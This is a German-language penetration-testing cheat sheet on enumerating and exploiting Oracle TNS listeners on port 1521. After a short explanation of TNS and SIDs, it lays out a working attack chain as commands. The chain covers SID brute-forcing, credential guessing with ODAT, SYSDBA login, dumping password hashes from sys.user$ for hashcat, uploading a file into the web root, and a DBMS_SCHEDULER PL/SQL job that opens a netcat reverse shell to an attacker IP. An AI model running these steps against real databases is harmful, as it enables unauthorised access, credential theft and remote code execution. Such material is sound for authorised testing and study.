1521 - Oracle TNS
Einführung
Oracle TNS (Transparent Network Substrate) ist ein Kommunikationsprotokoll, das Oracle-Datenbanken verwenden, um Netzwerkverbindungen von Clients entgegenzunehmen und weiterzuleiten. Es gehört zu Oracle Net Services.
Auf jedem Oracle-Datenbankserver läuft in der Regel ein sogenannter TNS Listener. Dieser Listener ist ein separater Prozess, der auf eingehende Verbindungen lauscht – standardmäßig auf TCP-Port 1521. Sobald eine Verbindung eingeht, leitet er sie an die richtige Datenbankinstanz weiter.
Instanzen und SID
Ein Oracle-Datenbankserver kann mehrere Instanzen gleichzeitig betreiben. Jede Instanz ist ein eigener Satz von Prozessen und Speicherstrukturen, der mit einer bestimmten Datenbankdatei arbeitet.
Zur eindeutigen Identifikation verwendet Oracle den SID (System Identifier) – das ist der eindeutige Name einer Instanz auf dem Server.
Wenn sich ein Client verbinden möchte, muss er den Host, den Port und den SID kennen. Nur so weiß der Listener, welche Instanz gemeint ist.
Beispiel für eine Verbindung:
sqlplus scott/tiger@//10.0.0.1:1521/XE
# Username/Password@//IP:Port/SIDOracle TNS Enumeration & Exploitation
Port Scan
Nmap
sudo nmap -p1521 -sV <ZIEL-IP> --openZiel: Prüfen, ob ein Oracle Listener läuft und welcher Versionstyp verwendet wird (z. B. 11.2.0.2.0).
SID Enumeration
Nmap-Skript
sudo nmap -p1521 -sV <ZIEL-IP> --open --script oracle-sid-bruteErkennt installierte Instanzen wie z. B. XE, was für Login erforderlich ist.
Benutzer/Passwort Enumeration mit ODAT
./odat.py all -s <ZIEL-IP>Beobachtungen:
Konten wie
mdsys,outlnsind gesperrtGültige Kombination
scott/tigergefunden → Weiterverwendung möglich
Verbindungsaufbau mit SQL*Plus
sqlplus scott/tiger@<ZIEL-IP>/XEBei Shared-Library-Fehler:
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfigRechte- und Tabellen-Check
SQL> select table_name from all_tables;
SQL> select * from user_role_privs;Ziel: Prüfen, ob der Benutzer Zugriff auf Tabellen hat und welche Rollen aktiv sind. Rollen wie DBA wären kritisch.
Login als SYSDBA (Privilege Escalation)
sqlplus scott/tiger@<ZIEL-IP>/XE as sysdbaSQL-Ausgabe zeigt mögliche Übernahme der Datenbank mit Rollen wie DBA, SYS, etc.
Hash Extraction für Offline-Cracking
SQL> select name, password from sys.user$;Mit Hashcat offline knacken:
hashcat -m 112 -a 0 hashes.txt rockyou.txtFile Upload via ODAT
echo "Oracle File Upload Test" > test.txt
./odat.py utlfile -s <ZIEL-IP> -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot test.txt ./test.txtErgebnis testen:
curl -X GET http://<ZIEL-IP>/test.txtAusgabe sollte enthalten:
Oracle File Upload TestRCE via DBMS_SCHEDULER
BEGIN
DBMS_SCHEDULER.create_job(
job_name => 'revjob',
job_type => 'EXECUTABLE',
job_action => '/bin/bash',
number_of_arguments => 1,
enabled => FALSE,
auto_drop => FALSE);
DBMS_SCHEDULER.set_job_argument_value('revjob',1,'-c "nc <ANGREIFER-IP> 4444 -e /bin/sh"');
DBMS_SCHEDULER.enable('revjob');
END;
/Ziel: Reverse Shell triggern über das SCHEDULER-Subsystem.
Fazit
Die Analyse zeigt: Standardkonfigurationen und veraltete Versionen in Oracle-Systemen bieten vielfältige Angriffsflächen. Tools wie ODAT in Kombination mit SQL*Plus ermöglichen es, Oracle-Datenbanken systematisch zu untersuchen und ggf. zu kompromittieren. Entscheidend ist dabei die Kombination aus SID-Bruteforce, Credential-Angriffen, Rechteauswertung und kreativer Ausnutzung von Features wie Dateioperationen oder Zeitsteuerungssystemen (SCHEDULER).
Last updated